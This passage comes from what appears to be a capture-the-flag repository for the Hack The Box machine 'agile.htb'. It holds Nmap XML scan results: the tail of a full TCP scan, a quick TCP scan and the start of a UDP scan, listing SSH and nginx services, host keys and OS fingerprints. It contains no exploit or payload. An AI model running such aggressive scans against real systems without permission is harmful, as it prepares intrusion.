<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">f4bcee21d71f1aa26572212d5ba6f700</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">65c1480d88cbb975a02ca5e6377e5106</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Welcome to nginx!"><elem key="title">Welcome to nginx!</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<portused state="closed" proto="udp" portid="39945"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="95" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="95" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="95" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="95" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="95" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="95" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="94" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="94"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="ASUS RT-N56U WAP (Linux 3.4)" accuracy="93" line="8398">
<osclass type="WAP" vendor="Asus" osfamily="embedded" accuracy="93"><cpe>cpe:/h:asus:rt-n56u</cpe></osclass>
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.16" accuracy="93" line="64171">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.16</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="93" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="OS:SCAN(V=7.93%E=4%D=3/5%OT=22%CT=1%CU=39945%PV=Y%DS=2%DC=T%G=Y%TM=64048588&#xa;OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)SEQ(SP=10&#xa;OS:5%GCD=2%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3&#xa;OS:=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=F&#xa;OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW&#xa;OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF&#xa;OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=&#xa;OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=&#xa;OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI&#xa;OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2271466" lastboot="Tue Feb 7 06:07:42 2023"/>
<distance value="2"/>
<tcpsequence index="261" difficulty="Good luck!" values="F2FC8C43,9E3D6224,16BE152B,2C402A7F,7D7C6C84,10FD4079"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="8763B429,8763B47E,8763B529,8763B57E,8763B5D3,8763B628"/>
<trace port="8080" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="111.48"/>
<hop ttl="2" ipaddr="10.129.29.4" rtt="111.57" host="agile.htb"/>
</trace>
<times srtt="110903" rttvar="11728" to="157815"/>
</host>
<taskbegin task="NSE" time="1678017928"/>
<taskend task="NSE" time="1678017928"/>
<taskbegin task="NSE" time="1678017928"/>
<taskend task="NSE" time="1678017928"/>
<taskbegin task="NSE" time="1678017928"/>
<taskend task="NSE" time="1678017928"/>
<runstats><finished time="1678017928" timestr="Sun Mar 5 13:05:28 2023" summary="Nmap done at Sun Mar 5 13:05:28 2023; 1 IP address (1 host up) scanned in 490.31 seconds" elapsed="490.31" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

116
HTB/agile/results/agile.htb/scans/xml/_quick_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,116 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/simon/htb/agile/results/agile.htb/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_quick_tcp_nmap.xml agile.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/simon/htb/agile/results/agile.htb/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_quick_tcp_nmap.xml agile.htb" start="1678017439" startstr="Sun Mar 5 12:57:19 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="SYN Stealth Scan" time="1678017440"/>
<taskend task="SYN Stealth Scan" time="1678017443" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1678017443"/>
<taskend task="Service scan" time="1678017450" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1678017468"/>
<taskend task="Traceroute" time="1678017468"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1678017468"/>
<taskend task="Parallel DNS resolution of 1 host." time="1678017468"/>
<taskbegin task="NSE" time="1678017468"/>
<taskend task="NSE" time="1678017474"/>
<taskbegin task="NSE" time="1678017474"/>
<taskend task="NSE" time="1678017474"/>
<taskbegin task="NSE" time="1678017474"/>
<taskend task="NSE" time="1678017474"/>
<host starttime="1678017440" endtime="1678017474"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.29.4" addrtype="ipv4"/>
<hostnames>
<hostname name="agile.htb" type="user"/>
<hostname name="agile.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="998">
<extrareasons reason="reset" count="998" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=&#xa; 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK"><table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=</elem>
<elem key="fingerprint">f4bcee21d71f1aa26572212d5ba6f700</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK</elem>
<elem key="fingerprint">65c1480d88cbb975a02ca5e6377e5106</elem>
<elem key="bits">256</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Welcome to nginx!"><elem key="title">Welcome to nginx!</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<portused state="closed" proto="udp" portid="42905"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="95" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="95" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="95" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="95" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="95" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="95" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="94" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="94"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="ASUS RT-N56U WAP (Linux 3.4)" accuracy="93" line="8398">
<osclass type="WAP" vendor="Asus" osfamily="embedded" accuracy="93"><cpe>cpe:/h:asus:rt-n56u</cpe></osclass>
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.16" accuracy="93" line="64171">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.16</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="93" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=3/5%OT=22%CT=1%CU=42905%PV=Y%DS=2%DC=T%G=N%TM=640483C2%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)&#xa;SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)&#xa;OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2271013" lastboot="Tue Feb 7 06:07:42 2023"/>
<distance value="2"/>
<tcpsequence index="262" difficulty="Good luck!" values="708668A7,B7741546,9EFC410A,A355DDB2,52D9B8E2,BB2F6045"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="875CBE39,875CBE8D,875CBF8D,875CBFE3,875CC0E2,875CC13A"/>
<trace port="587" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="199.29"/>
<hop ttl="2" ipaddr="10.129.29.4" rtt="199.53" host="agile.htb"/>
</trace>
<times srtt="180522" rttvar="39787" to="339670"/>
</host>
<taskbegin task="NSE" time="1678017475"/>
<taskend task="NSE" time="1678017475"/>
<taskbegin task="NSE" time="1678017475"/>
<taskend task="NSE" time="1678017475"/>
<taskbegin task="NSE" time="1678017475"/>
<taskend task="NSE" time="1678017475"/>
<runstats><finished time="1678017475" timestr="Sun Mar 5 12:57:55 2023" summary="Nmap done at Sun Mar 5 12:57:55 2023; 1 IP address (1 host up) scanned in 36.44 seconds" elapsed="36.44" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

68
HTB/agile/results/agile.htb/scans/xml/_top_100_udp_nmap.xml Normal file
View File

@@ -0,0 +1,68 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/simon/htb/agile/results/agile.htb/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_top_100_udp_nmap.xml agile.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/simon/htb/agile/results/agile.htb/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_top_100_udp_nmap.xml agile.htb" start="1678017439" startstr="Sun Mar 5 12:57:19 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="UDP Scan" time="1678017440"/>
<taskend task="UDP Scan" time="1678017534" extrainfo="100 total ports"/>
<taskbegin task="Service scan" time="1678017534"/>
<taskprogress task="Service scan" time="1678017595" percent="10.00" remaining="550" etc="1678018144"/>
<taskend task="Service scan" time="1678017631" extrainfo="10 services on 1 host"/>
<taskbegin task="Traceroute" time="1678017633"/>
<taskend task="Traceroute" time="1678017633"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1678017633"/>
<taskend task="Parallel DNS resolution of 1 host." time="1678017633"/>
<taskbegin task="NSE" time="1678017633"/>
<taskend task="NSE" time="1678017663"/>
<taskbegin task="NSE" time="1678017663"/>
<taskend task="NSE" time="1678017664"/>
<taskbegin task="NSE" time="1678017664"/>
<taskend task="NSE" time="1678017664"/>
<host starttime="1678017440" endtime="1678017664"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.29.4" addrtype="ipv4"/>
<hostnames>
<hostname name="agile.htb" type="user"/>
<hostname name="agile.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="90">
<extrareasons reason="port-unreach" count="90" proto="udp" ports="7,9,17,19,49,53,67,69,80,88,120,123,135-139,158,161-162,427,443,445,497,500,515,518,520,593,623,626,631,996-999,1022-1023,1025,1027-1030,1433-1434,1645-1646,1701,1719,1813,1900,2000,2048-2049,2222,3283,3456,3703,4444,4500,5060,5353,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
</extraports>
<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
